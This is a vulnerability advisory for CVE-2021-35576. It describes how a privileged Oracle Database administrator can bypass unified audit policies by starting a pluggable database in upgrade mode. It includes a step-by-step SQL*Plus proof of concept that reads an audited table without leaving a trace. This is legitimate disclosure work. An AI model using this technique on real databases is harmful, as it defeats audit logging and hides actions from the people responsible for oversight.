Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPass Product: Database Manufacturer: Oracle Affected Version(s): 12.1.0.2, 12.2.0.1, 19c Tested Version(s): 19c Risk Level: low Solution Status: Fixed Manufacturer Notification: 2021-03-17 Solution Date: 2021-10-17 Public Disclosure: 2022-06-11 CVE Reference: CVE-2021-35576 Author of Advisory: Emad Al-Mousa Overview: Oracle Database is a general purpose relational database management system (RDMBS). Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources.The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role. ***************************************** Vulnerability Details: The vulnerability will allow database administrator or system admin with access to the database server (either local login or remote authentication)to bypass a custom in-place audit policy defined in the oracle database system. Moreover, setting the database in upgrade mode will disable auditingand threat actor can perform malicious operations without detection. ***************************************** Proof of Concept (PoC): I will create a table in pluggable database PDB1 under HR schema and insert few records: SQL> CREATE TABLE HR.EMPLOYEE ( FIRST_NAME VARCHAR2(50), LAST_NAME VARCHAR2(50) ); SQL> INSERT INTO HR.EMPLOYEE ( FIRST_NAME, LAST_NAME) VALUES ( 'EMAD','MOUSA' ); SQL> commit; SQL> INSERT INTO HR.EMPLOYEE ( FIRST_NAME, LAST_NAME) VALUES ( 'SAMI','MOUSA' ); SQL> commit; I will now create audit policy: SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE; SQL> audit policy SELECT_P1; To check audit policies configured in PDB1 database: SQL> SELECT * FROM audit_unified_enabled_policies; Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode: sqlplus / as sysdba SQL> alter session set container=PDB1; SQL> shutdown immediate; SQL> startup upgrade; SQL> select * from HR.EMPLOYEE; SQL> startup force; SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL; Checking the audit logs using the query, NO entry is found recorded in the unified audit trail: SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc; So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view ! ***************************************** References: https://www.oracle.com/security-alerts/cpuoct2021.html https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/ https://nvd.nist.gov/vuln/detail/CVE-2021-35576 Credit: Emad Al-Mousa: CVE-2021-35576